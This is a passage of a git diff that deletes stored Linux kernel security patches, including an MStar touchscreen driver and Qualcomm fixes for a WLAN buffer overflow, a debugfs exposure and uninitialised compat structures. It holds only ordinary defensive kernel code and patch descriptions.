-- retval = msg21xx_ts_power_on(ts_data, true);
-- if (retval) {
-- dev_err(dev, "msg21xx_ts power on failed");
-- mutex_unlock(&ts_data->ts_mutex);
-- return retval;
-- }
--
-- if (ts_data->ts_pinctrl) {
-- retval = pinctrl_select_state(ts_data->ts_pinctrl,
-- ts_data->pinctrl_state_active);
-- if (retval < 0) {
-- dev_err(dev, "Cannot get active pinctrl state\n");
-- mutex_unlock(&ts_data->ts_mutex);
-- return retval;
-- }
-- }
--
-- retval = msg21xx_ts_gpio_configure(ts_data, true);
-- if (retval) {
-- dev_err(dev, "Failed to put gpios in active state %d",
-- retval);
-- mutex_unlock(&ts_data->ts_mutex);
-- return retval;
-- }
--
-- enable_irq(ts_data->client->irq);
-- ts_data->suspended = false;
--
-- mutex_unlock(&ts_data->ts_mutex);
--
-- return 0;
--}
--
--static int msg21xx_ts_suspend(struct device *dev)
--{
-- int retval;
-- struct msg21xx_ts_data *ts_data = dev_get_drvdata(dev);
--
-- if (ts_data->pdata->updating_fw) {
-- dev_info(dev, "Firmware loading in progress\n");
-- return 0;
-- }
--
-- if (ts_data->suspended) {
-- dev_info(dev, "msg21xx_ts already in suspend\n");
-- return 0;
-- }
--
--#ifdef CONFIG_TOUCHSCREEN_PROXIMITY_SENSOR
-- if (bEnableTpProximity) {
-- dev_dbg(dev, "suspend bEnableTpProximity=%d\n",
-- bEnableTpProximity);
-- return 0;
-- }
--#endif
--
-- mutex_lock(&ts_data->ts_mutex);
--
-- disable_irq(ts_data->client->irq);
--
-- touch_driver_touch_released(ts_data);
--
-- if (ts_data->ts_pinctrl) {
-- retval = pinctrl_select_state(ts_data->ts_pinctrl,
-- ts_data->pinctrl_state_suspend);
-- if (retval < 0) {
-- dev_err(dev, "Cannot get idle pinctrl state %d\n",
-- retval);
-- mutex_unlock(&ts_data->ts_mutex);
-- return retval;
-- }
-- }
--
-- retval = msg21xx_ts_gpio_configure(ts_data, false);
-- if (retval) {
-- dev_err(dev, "Failed to put gpios in idle state %d",
-- retval);
-- mutex_unlock(&ts_data->ts_mutex);
-- return retval;
-- }
--
-- retval = msg21xx_ts_power_on(ts_data, false);
-- if (retval) {
-- dev_err(dev, "msg21xx_ts power off failed");
-- mutex_unlock(&ts_data->ts_mutex);
-- return retval;
-- }
--
-- ts_data->suspended = true;
--
-- mutex_unlock(&ts_data->ts_mutex);
--
-- return 0;
--}
--#else
--static int msg21xx_ts_resume(struct device *dev)
--{
-- return 0;
--}
--static int msg21xx_ts_suspend(struct device *dev)
--{
-- return 0;
--}
--#endif
--
--static int msg21xx_debug_suspend_set(void *_data, u64 val)
--{
-- struct msg21xx_ts_data *data = _data;
--
-- mutex_lock(&data->input_dev->mutex);
--
-- if (val)
-- msg21xx_ts_suspend(&data->client->dev);
-- else
-- msg21xx_ts_resume(&data->client->dev);
--
-- mutex_unlock(&data->input_dev->mutex);
--
-- return 0;
--}
--
--static int msg21xx_debug_suspend_get(void *_data, u64 *val)
--{
-- struct msg21xx_ts_data *data = _data;
--
-- mutex_lock(&data->input_dev->mutex);
-- *val = data->suspended;
-- mutex_unlock(&data->input_dev->mutex);
--
-- return 0;
--}
--
--DEFINE_SIMPLE_ATTRIBUTE(debug_suspend_fops, msg21xx_debug_suspend_get,
-- msg21xx_debug_suspend_set, "%lld\n");
--
--
--#if defined(CONFIG_FB)
--static int fb_notifier_callback(struct notifier_block *self,
-- unsigned long event, void *data)
--{
-- struct fb_event *evdata = data;
-- int *blank;
-- struct msg21xx_ts_data *ts_data =
-- container_of(self, struct msg21xx_ts_data, fb_notif);
--
-- if (evdata && evdata->data && event == FB_EVENT_BLANK) {
-- blank = evdata->data;
-- if (*blank == FB_BLANK_UNBLANK)
-- msg21xx_ts_resume(&ts_data->client->dev);
-- else if (*blank == FB_BLANK_POWERDOWN)
-- msg21xx_ts_suspend(&ts_data->client->dev);
-- }
--
-- return 0;
--}
--#endif
--
--static int msg21xx_get_dt_coords(struct device *dev, char *name,
-- struct msg21xx_ts_platform_data *pdata)
--{
-- u32 coords[FT_COORDS_ARR_SIZE];
-- struct property *prop;
-- struct device_node *np = dev->of_node;
-- int coords_size, rc;
--
-- prop = of_find_property(np, name, NULL);
-- if (!prop)
-- return -EINVAL;
-- if (!prop->value)
-- return -ENODATA;
--
-- coords_size = prop->length / sizeof(u32);
-- if (coords_size != FT_COORDS_ARR_SIZE) {
-- dev_err(dev, "invalid %s\n", name);
-- return -EINVAL;
-- }
--
-- rc = of_property_read_u32_array(np, name, coords, coords_size);
-- if (rc && (rc != -EINVAL)) {
-- dev_err(dev, "Unable to read %s\n", name);
-- return rc;
-- }
--
-- if (!strcmp(name, "mstar,panel-coords")) {
-- pdata->panel_minx = coords[0];
-- pdata->panel_miny = coords[1];
-- pdata->panel_maxx = coords[2];
-- pdata->panel_maxy = coords[3];
-- } else if (!strcmp(name, "mstar,display-coords")) {
-- pdata->x_min = coords[0];
-- pdata->y_min = coords[1];
-- pdata->x_max = coords[2];
-- pdata->y_max = coords[3];
-- } else {
-- dev_err(dev, "unsupported property %s\n", name);
-- return -EINVAL;
-- }
--
-- return 0;
--}
--
--static int msg21xx_parse_dt(struct device *dev,
-- struct msg21xx_ts_platform_data *pdata)
--{
-- int rc;
-- struct device_node *np = dev->of_node;
-- struct property *prop;
-- u32 temp_val;
--
-- rc = msg21xx_get_dt_coords(dev, "mstar,panel-coords", pdata);
-- if (rc && (rc != -EINVAL))
-- return rc;
--
-- rc = msg21xx_get_dt_coords(dev, "mstar,display-coords", pdata);
-- if (rc)
-- return rc;
--
-- rc = of_property_read_u32(np, "mstar,hard-reset-delay-ms",
-- &temp_val);
-- if (!rc)
-- pdata->hard_reset_delay_ms = temp_val;
-- else
-- return rc;
--
-- rc = of_property_read_u32(np, "mstar,post-hard-reset-delay-ms",
-- &temp_val);
-- if (!rc)
-- pdata->post_hard_reset_delay_ms = temp_val;
-- else
-- return rc;
--
-- /* reset, irq gpio info */
-- pdata->reset_gpio = of_get_named_gpio_flags(np, "mstar,reset-gpio",
-- 0, &pdata->reset_gpio_flags);
-- if (pdata->reset_gpio < 0)
-- return pdata->reset_gpio;
--
-- pdata->irq_gpio = of_get_named_gpio_flags(np, "mstar,irq-gpio",
-- 0, &pdata->irq_gpio_flags);
-- if (pdata->irq_gpio < 0)
-- return pdata->irq_gpio;
--
-- rc = of_property_read_u32(np, "mstar,ic-type", &temp_val);
-- if (rc && (rc != -EINVAL))
-- return rc;
--
-- pdata->ic_type = temp_val;
--
-- rc = of_property_read_u32(np, "mstar,num-max-touches", &temp_val);
-- if (!rc)
-- pdata->num_max_touches = temp_val;
-- else
-- return rc;
--
-- prop = of_find_property(np, "mstar,button-map", NULL);
-- if (prop) {
-- pdata->num_buttons = prop->length / sizeof(temp_val);
-- if (pdata->num_buttons > MAX_BUTTONS)
-- return -EINVAL;
--
-- rc = of_property_read_u32_array(np,
-- "mstar,button-map", pdata->button_map,
-- pdata->num_buttons);
-- if (rc) {
-- dev_err(dev, "Unable to read key codes\n");
-- return rc;
-- }
-- }
--
-- return 0;
--}
--
--/* probe function is used for matching and initializing input device */
--static int msg21xx_ts_probe(struct i2c_client *client,
-- const struct i2c_device_id *id) {
--
-- int ret = 0, i;
-- struct dentry *temp, *dir;
-- struct input_dev *input_dev;
-- struct msg21xx_ts_data *ts_data;
-- struct msg21xx_ts_platform_data *pdata;
--
-- if (client->dev.of_node) {
-- pdata = devm_kzalloc(&client->dev,
-- sizeof(struct msg21xx_ts_platform_data), GFP_KERNEL);
-- if (!pdata)
-- return -ENOMEM;
--
-- ret = msg21xx_parse_dt(&client->dev, pdata);
-- if (ret) {
-- dev_err(&client->dev, "DT parsing failed\n");
-- return ret;
-- }
-- } else
-- pdata = client->dev.platform_data;
--
-- if (!i2c_check_functionality(client->adapter, I2C_FUNC_I2C)) {
-- dev_err(&client->dev, "I2C not supported\n");
-- return -ENODEV;
-- }
--
-- ts_data = devm_kzalloc(&client->dev,
-- sizeof(struct msg21xx_ts_data), GFP_KERNEL);
-- if (!ts_data)
-- return -ENOMEM;
--
-- ts_data->client = client;
-- ts_data->info.point = devm_kzalloc(&client->dev,
-- sizeof(struct touchPoint_t) * pdata->num_max_touches,
-- GFP_KERNEL);
-- if (!ts_data->info.point) {
-- dev_err(&client->dev, "Not enough memory\n");
-- return -ENOMEM;
-- }
--
-- /* allocate an input device */
-- input_dev = input_allocate_device();
-- if (!input_dev) {
-- ret = -ENOMEM;
-- dev_err(&client->dev, "input device allocation failed\n");
-- goto err_input_allocate_dev;
-- }
--
-- input_dev->name = client->name;
-- input_dev->phys = "I2C";
-- input_dev->dev.parent = &client->dev;
-- input_dev->id.bustype = BUS_I2C;
--
-- ts_data->input_dev = input_dev;
-- ts_data->client = client;
-- ts_data->pdata = pdata;
--
-- input_set_drvdata(input_dev, ts_data);
-- i2c_set_clientdata(client, ts_data);
--
-- ret = msg21xx_ts_power_init(ts_data, true);
-- if (ret) {
-- dev_err(&client->dev, "Mstar power init failed\n");
-- return ret;
-- }
--
-- ret = msg21xx_ts_power_on(ts_data, true);
-- if (ret) {
-- dev_err(&client->dev, "Mstar power on failed\n");
-- goto exit_deinit_power;
-- }
--
-- ret = msg21xx_pinctrl_init(ts_data);
-- if (!ret && ts_data->ts_pinctrl) {
-- /*
-- * Pinctrl handle is optional. If pinctrl handle is found
-- * let pins to be configured in active state. If not
-- * found continue further without error.
-- */ -- ret = pinctrl_select_state(ts_data->ts_pinctrl, -- ts_data->pinctrl_state_active); -- if (ret < 0) -- dev_err(&client->dev, -- "Failed to select %s pinatate %d\n", -- PINCTRL_STATE_ACTIVE, ret); -- } -- -- ret = msg21xx_ts_gpio_configure(ts_data, true); -- if (ret) { -- dev_err(&client->dev, "Failed to configure gpio %d\n", ret); -- goto exit_gpio_config; -- } -- -- if (msg21xx_get_ic_type(ts_data) == 0) { -- dev_err(&client->dev, "The current IC is not Mstar\n"); -- ret = -1; -- goto err_wrong_ic_type; -- } -- -- mutex_init(&msg21xx_mutex); -- mutex_init(&ts_data->ts_mutex); -- -- /* set the supported event type for input device */ -- set_bit(EV_ABS, input_dev->evbit); -- set_bit(EV_SYN, input_dev->evbit); -- set_bit(EV_KEY, input_dev->evbit); -- set_bit(BTN_TOUCH, input_dev->keybit); -- set_bit(BTN_TOOL_FINGER, input_dev->keybit); -- set_bit(INPUT_PROP_DIRECT, input_dev->propbit); -- -- for (i = 0; i < pdata->num_buttons; i++) -- input_set_capability(input_dev, EV_KEY, pdata->button_map[i]); -- -- input_set_drvdata(input_dev, ts_data); -- i2c_set_clientdata(client, ts_data); -- --#ifdef CONFIG_TP_HAVE_KEY -- { -- int i; -- -- for (i = 0; i < num_buttons; i++) -- input_set_capability(input_dev, EV_KEY, button_map[i]); -- } --#endif -- -- input_set_abs_params(input_dev, ABS_MT_TOUCH_MAJOR, -- 0, 2, 0, 0); -- input_set_abs_params(input_dev, ABS_MT_TOUCH_MAJOR, 0, 2, 0, 0); -- input_set_abs_params(input_dev, ABS_MT_POSITION_X, -- 0, pdata->x_max, 0, 0); -- input_set_abs_params(input_dev, ABS_MT_POSITION_Y, -- 0, pdata->y_max, 0, 0); -- ret = input_mt_init_slots(input_dev, pdata->num_max_touches, 0); -- if (ret) { -- dev_err(&client->dev, -- "Error %d initialising slots\n", ret); -- goto err_free_mem; -- } -- -- /* register the input device to input sub-system */ -- ret = input_register_device(input_dev); -- if (ret < 0) { -- dev_err(&client->dev, -- "Unable to register ms-touchscreen input device\n"); -- goto err_input_reg_dev; -- } -- -- /* version */ -- if 
(device_create_file(&client->dev, &dev_attr_version) < 0) { -- dev_err(&client->dev, -- "Failed to create device file(%s)!\n", -- dev_attr_version.attr.name); -- goto err_create_fw_ver_file; -- } -- /* update */ -- if (device_create_file(&client->dev, &dev_attr_update) < 0) { -- dev_err(&client->dev, -- "Failed to create device file(%s)!\n", -- dev_attr_update.attr.name); -- goto err_create_fw_update_file; -- } -- /* data */ -- if (device_create_file(&client->dev, &dev_attr_data) < 0) { -- dev_err(&client->dev, -- "Failed to create device file(%s)!\n", -- dev_attr_data.attr.name); -- goto err_create_fw_data_file; -- } -- /* fw name */ -- if (device_create_file(&client->dev, &dev_attr_fw_name) < 0) { -- dev_err(&client->dev, -- "Failed to create device file(%s)!\n", -- dev_attr_fw_name.attr.name); -- goto err_create_fw_name_file; -- } -- /* smart fw update */ -- if (device_create_file(&client->dev, &dev_attr_update_fw) < 0) { -- dev_err(&client->dev, -- "Failed to create device file(%s)!\n", -- dev_attr_update_fw.attr.name); -- goto err_create_update_fw_file; -- } -- /* smart fw force update */ -- if (device_create_file(&client->dev, -- &dev_attr_force_update_fw) < 0) { -- dev_err(&client->dev, -- "Failed to create device file(%s)!\n", -- dev_attr_force_update_fw.attr.name); -- goto err_create_force_update_fw_file; -- } -- dir = debugfs_create_dir(MSTAR_DEBUG_DIR_NAME, NULL); -- temp = debugfs_create_file("suspend", S_IRUSR | S_IWUSR, dir, -- ts_data, &debug_suspend_fops); -- if (temp == NULL || IS_ERR(temp)) { -- dev_err(&client->dev, -- "debugfs_create_file failed: rc=%ld\n", PTR_ERR(temp)); -- goto free_debug_dir; -- } -- --#ifdef TP_PRINT -- tp_print_create_entry(ts_data); --#endif -- -- ret = request_threaded_irq(client->irq, NULL, -- msg21xx_ts_interrupt, -- pdata->irq_gpio_flags | IRQF_ONESHOT, -- "msg21xx", ts_data); -- if (ret) -- goto err_req_irq; -- -- disable_irq(client->irq); -- --#if defined(CONFIG_FB) -- ts_data->fb_notif.notifier_call = 
fb_notifier_callback; -- ret = fb_register_client(&ts_data->fb_notif); --#endif -- --#ifdef CONFIG_TOUCHSCREEN_PROXIMITY_SENSOR -- tsps_assist_register_callback("msg21xx", &tsps_msg21xx_enable, -- &tsps_msg21xx_data); --#endif -- -- dev_dbg(&client->dev, "mstar touch screen registered\n"); -- enable_irq(client->irq); -- return 0; -- --err_req_irq: -- free_irq(client->irq, ts_data); -- device_remove_file(&client->dev, &dev_attr_data); --free_debug_dir: -- debugfs_remove_recursive(dir); --err_create_fw_data_file: -- device_remove_file(&client->dev, &dev_attr_update); --err_create_fw_update_file: -- device_remove_file(&client->dev, &dev_attr_version); --err_create_fw_name_file: -- device_remove_file(&client->dev, &dev_attr_fw_name); --err_create_update_fw_file: -- device_remove_file(&client->dev, &dev_attr_update_fw); --err_create_force_update_fw_file: -- device_remove_file(&client->dev, &dev_attr_force_update_fw); --err_create_fw_ver_file: -- input_unregister_device(input_dev); -- --err_input_reg_dev: -- input_free_device(input_dev); -- input_dev = NULL; --err_input_allocate_dev: -- mutex_destroy(&msg21xx_mutex); -- mutex_destroy(&ts_data->ts_mutex); -- --err_wrong_ic_type: -- msg21xx_ts_gpio_configure(ts_data, false); --exit_gpio_config: -- if (ts_data->ts_pinctrl) { -- if (IS_ERR_OR_NULL(ts_data->pinctrl_state_release)) { -- devm_pinctrl_put(ts_data->ts_pinctrl); -- ts_data->ts_pinctrl = NULL; -- } else { -- ret = pinctrl_select_state(ts_data->ts_pinctrl, -- ts_data->pinctrl_state_release); -- if (ret < 0) -- dev_err(&ts_data->client->dev, -- "Cannot get release pinctrl state\n"); -- } -- } -- msg21xx_ts_power_on(ts_data, false); --exit_deinit_power: -- msg21xx_ts_power_init(ts_data, false); --err_free_mem: -- input_free_device(input_dev); -- -- return ret; --} -- --/* remove function is triggered when the input device is removed -- *from input sub-system -- */ --static int touch_driver_remove(struct i2c_client *client) --{ -- int retval = 0; -- struct 
msg21xx_ts_data *ts_data = i2c_get_clientdata(client); -- -- free_irq(ts_data->client->irq, ts_data); -- gpio_free(ts_data->pdata->irq_gpio); -- gpio_free(ts_data->pdata->reset_gpio); -- -- if (ts_data->ts_pinctrl) { -- if (IS_ERR_OR_NULL(ts_data->pinctrl_state_release)) { -- devm_pinctrl_put(ts_data->ts_pinctrl); -- ts_data->ts_pinctrl = NULL; -- } else { -- retval = pinctrl_select_state(ts_data->ts_pinctrl, -- ts_data->pinctrl_state_release); -- if (retval < 0) -- dev_err(&ts_data->client->dev, -- "Cannot get release pinctrl state\n"); -- } -- } -- -- input_unregister_device(ts_data->input_dev); -- mutex_destroy(&msg21xx_mutex); -- mutex_destroy(&ts_data->ts_mutex); -- -- return retval; --} -- --/* The I2C device list is used for matching I2C device -- *and I2C device driver. -- */ --static const struct i2c_device_id touch_device_id[] = { -- {"msg21xx", 0}, -- {}, /* should not omitted */ --}; -- --static const struct of_device_id msg21xx_match_table[] = { -- { .compatible = "mstar,msg21xx", }, -- { }, --}; -- --MODULE_DEVICE_TABLE(i2c, touch_device_id); -- --static struct i2c_driver touch_device_driver = { -- .driver = { -- .name = "ms-msg21xx", -- .owner = THIS_MODULE, -- .of_match_table = msg21xx_match_table, -- }, -- .probe = msg21xx_ts_probe, -- .remove = touch_driver_remove, -- .id_table = touch_device_id, --}; -- --module_i2c_driver(touch_device_driver); -- --#ifdef TP_PRINT --#include -- --static unsigned short InfoAddr = 0x0F, PoolAddr = 0x10, TransLen = 256; --static unsigned char row, units, cnt; -- --static int tp_print_proc_read(struct msg21xx_ts_data *ts_data) --{ -- unsigned short i, j; -- unsigned short left, offset = 0; -- unsigned char dbbus_tx_data[3] = {0}; -- unsigned char u8Data; -- signed short s16Data; -- int s32Data; -- char *buf = NULL; -- -- left = cnt*row*units; -- if ((ts_data->suspended == 0) && -- (InfoAddr != 0x0F) && -- (PoolAddr != 0x10) && -- (left > 0)) { -- buf = kmalloc(left, GFP_KERNEL); -- if (buf != NULL) { -- -- while 
(left > 0) { -- dbbus_tx_data[0] = 0x53; -- dbbus_tx_data[1] = ((PoolAddr + offset) >> 8) -- & 0xFF; -- dbbus_tx_data[2] = (PoolAddr + offset) & 0xFF; -- mutex_lock(&msg21xx_mutex); -- write_i2c_seq(ts_data, ts_data->client->addr, -- &dbbus_tx_data[0], 3); -- read_i2c_seq(ts_data, ts_data->client->addr, -- &buf[offset], -- left > TransLen ? TransLen : left); -- mutex_unlock(&msg21xx_mutex); -- -- if (left > TransLen) { -- left -= TransLen; -- offset += TransLen; -- } else { -- left = 0; -- } -- } -- -- for (i = 0; i < cnt; i++) { -- for (j = 0; j < row; j++) { -- if (units == 1) { -- u8Data = buf[i * row * units + -- j * units]; -- } else if (units == 2) { -- s16Data = buf[i * row * units + -- j * units] + -- (buf[i * row * units + -- j * units + 1] << 8); -- } else if (units == 4) { -- s32Data = buf[i * row * units + -- j * units] + -- (buf[i * row * units + -- j * units + 1] << 8) + -- (buf[i * row * units + -- j * units + 2] << 16) + -- (buf[i * row * units + -- j * units + 3] << 24); -- } -- } -- } -- -- kfree(buf); -- } -- } -- -- return 0; --} -- --static void tp_print_create_entry(struct msg21xx_ts_data *ts_data) --{ -- unsigned char dbbus_tx_data[3] = {0}; -- unsigned char dbbus_rx_data[8] = {0}; -- -- dbbus_tx_data[0] = 0x53; -- dbbus_tx_data[1] = 0x00; -- dbbus_tx_data[2] = 0x58; -- mutex_lock(&msg21xx_mutex); -- write_i2c_seq(ts_data, ts_data->client->addr, &dbbus_tx_data[0], 3); -- read_i2c_seq(ts_data, ts_data->client->addr, &dbbus_rx_data[0], 4); -- mutex_unlock(&msg21xx_mutex); -- InfoAddr = (dbbus_rx_data[1]<<8) + dbbus_rx_data[0]; -- PoolAddr = (dbbus_rx_data[3]<<8) + dbbus_rx_data[2]; -- -- if ((InfoAddr != 0x0F) && (PoolAddr != 0x10)) { -- msleep(20); -- dbbus_tx_data[0] = 0x53; -- dbbus_tx_data[1] = (InfoAddr >> 8) & 0xFF; -- dbbus_tx_data[2] = InfoAddr & 0xFF; -- mutex_lock(&msg21xx_mutex); -- write_i2c_seq(ts_data, ts_data->client->addr, -- &dbbus_tx_data[0], 3); -- read_i2c_seq(ts_data, ts_data->client->addr, -- &dbbus_rx_data[0], 8); -- 
mutex_unlock(&msg21xx_mutex); -- -- units = dbbus_rx_data[0]; -- row = dbbus_rx_data[1]; -- cnt = dbbus_rx_data[2]; -- TransLen = (dbbus_rx_data[7]<<8) + dbbus_rx_data[6]; -- -- if (device_create_file(&ts_data->client->dev, -- &dev_attr_tpp) < 0) -- dev_err(&ts_data->client->dev, "Failed to create device file(%s)!\n", -- dev_attr_tpp.attr.name); -- } --} --#endif -- --MODULE_AUTHOR("MStar Semiconductor, Inc."); --MODULE_LICENSE("GPL v2"); --- -cgit v1.1 - diff --git a/Patches/Linux_CVEs/CVE-2017-6423/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-6423/ANY/0001.patch deleted file mode 100644 index d561f1ca..00000000 --- a/Patches/Linux_CVEs/CVE-2017-6423/ANY/0001.patch +++ /dev/null 
@@ -1,67 +0,0 @@
-From 0f264f812b61884390b432fdad081a3e995ba768 Mon Sep 17 00:00:00 2001
-From: Kaushal Kumar
-Date: Fri, 20 Jan 2017 15:23:40 +0530
-Subject: soc: qcom: make debugfs support configurable for kryo l2 accessors
- driver
-
-Add config option to enable/disable l2 indirect access debug capability.
-The driver exposes l2 indirect access debugfs interface to get/set data,
-address, and target cpus so keep it disabled by default.
-
-Change-Id: I22f84d16a3bf12a78295f2d052bb50e90d6f2a8b
-Signed-off-by: Kaushal Kumar
----
- drivers/soc/qcom/Kconfig | 10 ++++++++++
- drivers/soc/qcom/kryo-l2-accessors.c | 6 +++---
- 2 files changed, 13 insertions(+), 3 deletions(-)
-
-diff --git a/drivers/soc/qcom/Kconfig b/drivers/soc/qcom/Kconfig
-index ae2f304..b039090 100644
---- a/drivers/soc/qcom/Kconfig
-+++ b/drivers/soc/qcom/Kconfig
-@@ -292,6 +292,16 @@ config MSM_CACHE_M4M_ERP64_PANIC_ON_UE
- Say 'Y' here to cause kernel panic when uncorrectable cache/M4M errors
- are detected.
-
-+config MSM_L2_IA_DEBUG
-+ bool "Enable MSM L2 Indirect Access Debug"
-+ depends on DEBUG_FS
-+ default n
-+ help
-+ This option enables L2 indirect access debug
-+ capability. It exposes L2 indirect access
-+ debugfs interface to get/set data, address,
-+ and target cpus.
-+
- config MSM_RPM_SMD
- bool "RPM driver using SMD protocol"
- help
-diff --git a/drivers/soc/qcom/kryo-l2-accessors.c b/drivers/soc/qcom/kryo-l2-accessors.c
-index a945f9e..1d81074 100644
---- a/drivers/soc/qcom/kryo-l2-accessors.c
-+++ b/drivers/soc/qcom/kryo-l2-accessors.c
-@@ -1,5 +1,5 @@
- /*
-- * Copyright (c) 2014-2015, The Linux Foundation. All rights reserved.
-+ * Copyright (c) 2014-2015, 2017, The Linux Foundation. All rights reserved.
- *
- * This program is free software; you can redistribute it and/or modify
- * it under the terms of the GNU General Public License version 2 and
-@@ -80,7 +80,7 @@ u64 get_l2_indirect_reg(u64 reg)
- }
- EXPORT_SYMBOL(get_l2_indirect_reg);
-
--#if defined(CONFIG_DEBUG_FS)
-+#if defined(CONFIG_MSM_L2_IA_DEBUG)
-
- static u32 debug_addr;
- static int debug_target_cpu;
-@@ -180,4 +180,4 @@ static int l2_ia_debug_init(void)
- }
- late_initcall(l2_ia_debug_init);
-
--#endif /* CONFIG_DEBUG_FS */
-+#endif /* CONFIG_MSM_L2_IA_DEBUG */
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-6424/prima/0001.patch b/Patches/Linux_CVEs/CVE-2017-6424/prima/0001.patch
deleted file mode 100644
index a91f45c3..00000000
--- a/Patches/Linux_CVEs/CVE-2017-6424/prima/0001.patch
+++ /dev/null
@@ -1,50 +0,0 @@
-From 8cac3c4aac106b917e60e7aa7d4c4189e376913c Mon Sep 17 00:00:00 2001
-From: Nishank Aggarwal
-Date: Fri, 10 Feb 2017 15:48:13 +0530
-Subject: wlan: Fix buffer overflow in WLANSAP_Set_WPARSNIes()
-
-qcacld-2.0 to prima propagation
-
-Currently In WLANSAP_Set_WPARSNIes() the parameter WPARSNIEsLen
-is user-controllable and never validates which uses as the length
-for a memory copy. This enables user-space applications to corrupt
-heap memory and potentially crash the kernel.
-
-Fix is to validate the WPARSNIes length to its max before use as the
-length for a memory copy.
-
-Change-Id: I7aff731aeae22bfd84beb955439a799abef37f68
-CRs-Fixed: 1102648
----
- CORE/HDD/src/wlan_hdd_hostapd.c | 10 +++++++++-
- 1 file changed, 9 insertions(+), 1 deletion(-)
-
-diff --git a/CORE/HDD/src/wlan_hdd_hostapd.c b/CORE/HDD/src/wlan_hdd_hostapd.c
-index 33f7d50..c0c5c14 100644
---- a/CORE/HDD/src/wlan_hdd_hostapd.c
-+++ b/CORE/HDD/src/wlan_hdd_hostapd.c
-@@ -1,5 +1,5 @@
- /*
-- * Copyright (c) 2012-2016 The Linux Foundation. All rights reserved.
-+ * Copyright (c) 2012-2017 The Linux Foundation. All rights reserved.
- *
- * Previously licensed under the ISC license by Qualcomm Atheros, Inc.
- *
-@@ -4180,6 +4180,14 @@ static int __iw_set_ap_genie(struct net_device *dev,
- return 0;
- }
-
-+ if (wrqu->data.length > DOT11F_IE_RSN_MAX_LEN)
-+ {
-+ VOS_TRACE(VOS_MODULE_ID_HDD, VOS_TRACE_LEVEL_ERROR,
-+ "%s: WPARSN Ie input length is more than max[%d]", __func__,
-+ wrqu->data.length);
-+ return -EINVAL;
-+ }
-+
- switch (genie[0])
- {
- case DOT11F_EID_WPA:
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-6424/qcacld-2.0/0002.patch b/Patches/Linux_CVEs/CVE-2017-6424/qcacld-2.0/0002.patch
deleted file mode 100644
index cfc79dea..00000000
--- a/Patches/Linux_CVEs/CVE-2017-6424/qcacld-2.0/0002.patch
+++ /dev/null
@@ -1,40 +0,0 @@
-From 5cc2ac840e36a3342c5194c20b314f0bb95ef7e1 Mon Sep 17 00:00:00 2001
-From: Nishank Aggarwal
-Date: Thu, 12 Jan 2017 14:32:02 +0530
-Subject: qcacld-2.0: Fix buffer overflow in WLANSAP_Set_WPARSNIes()
-
-Currently In WLANSAP_Set_WPARSNIes() the parameter WPARSNIEsLen
-is user-controllable and never validates which uses as the length
-for a memory copy. This enables user-space applications to corrupt
-heap memory and potentially crash the kernel.
-
-Fix is to validate the WPARSNIes length to its max before use as the
-length for a memory copy.
-
-Change-Id: I7aff731aeae22bfd84beb955439a799abef37f68
-CRs-Fixed: 1102648
----
- CORE/HDD/src/wlan_hdd_hostapd.c | 7 +++++++
- 1 file changed, 7 insertions(+)
-
-diff --git a/CORE/HDD/src/wlan_hdd_hostapd.c b/CORE/HDD/src/wlan_hdd_hostapd.c
-index 693c0c9..59b32f2 100644
---- a/CORE/HDD/src/wlan_hdd_hostapd.c
-+++ b/CORE/HDD/src/wlan_hdd_hostapd.c
-@@ -6099,6 +6099,13 @@ static int __iw_set_ap_genie(struct net_device *dev,
- return 0;
- }
-
-+ if (wrqu->data.length > DOT11F_IE_RSN_MAX_LEN) {
-+ VOS_TRACE(VOS_MODULE_ID_HDD, VOS_TRACE_LEVEL_ERROR,
-+ "%s: WPARSN Ie input length is more than max[%d]", __func__,
-+ wrqu->data.length);
-+ return -EINVAL;
-+ }
-+
- switch (genie[0])
- {
- case DOT11F_EID_WPA:
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-6424/qcacld-3.0/0003.patch b/Patches/Linux_CVEs/CVE-2017-6424/qcacld-3.0/0003.patch
deleted file mode 100644
index 6f2cfdad..00000000
--- a/Patches/Linux_CVEs/CVE-2017-6424/qcacld-3.0/0003.patch
+++ /dev/null
@@ -1,41 +0,0 @@
-From 4e44b25b26a594aa8180827729d2b298c894fc5d Mon Sep 17 00:00:00 2001
-From: Nishank Aggarwal
-Date: Mon, 30 Jan 2017 15:32:32 +0530
-Subject: qcacld-3.0: Fix buffer overflow in WLANSAP_Set_WPARSNIes()
-
-qcacld-2.0 to qcacld-3.0 propagation
-
-Currently In WLANSAP_Set_WPARSNIes() the parameter WPARSNIEsLen
-is user-controllable and never validates which uses as the length
-for a memory copy. This enables user-space applications to corrupt
-heap memory and potentially crash the kernel.
-
-Fix is to validate the WPARSNIes length to its max before use as the
-length for a memory copy.
-
-Change-Id: I7aff731aeae22bfd84beb955439a799abef37f68
-CRs-Fixed: 1102648
----
- core/hdd/src/wlan_hdd_hostapd.c | 6 ++++++
- 1 file changed, 6 insertions(+)
-
-diff --git a/core/hdd/src/wlan_hdd_hostapd.c b/core/hdd/src/wlan_hdd_hostapd.c
-index c01d6a6..78c9df6 100644
---- a/core/hdd/src/wlan_hdd_hostapd.c
-+++ b/core/hdd/src/wlan_hdd_hostapd.c
-@@ -4979,6 +4979,12 @@ static int __iw_set_ap_genie(struct net_device *dev,
- return 0;
- }
-
-+ if (wrqu->data.length > DOT11F_IE_RSN_MAX_LEN) {
-+ hdd_err("%s: WPARSN Ie input length is more than max[%d]",
-+ __func__, wrqu->data.length);
-+ return QDF_STATUS_E_INVAL;
-+ }
-+
- switch (genie[0]) {
- case DOT11F_EID_WPA:
- case DOT11F_EID_RSN:
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-6425/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-6425/ANY/0001.patch
deleted file mode 100644
index 3c156278..00000000
--- a/Patches/Linux_CVEs/CVE-2017-6425/ANY/0001.patch
+++ /dev/null
@@ -1,46 +0,0 @@
-From ef86560a21fe1f256f6ba772a195201ff202c657 Mon Sep 17 00:00:00 2001
-From: "Sravan Kumar D.V.N"
-Date: Fri, 6 Jan 2017 13:50:04 +0530
-Subject: msm: mdss: Clear compat structures before copying to user
-
-In the compat layer, the temporary structures used to convert
-data from 32bit to 64bit structures need to be set to 0 before
-being assigned values.
-
-CRs-Fixed: 1103689
-Change-Id: I405500f427f3f4dc4d38a9fb188fece9a31614ca
-Signed-off-by: Sravan Kumar D.V.N
----
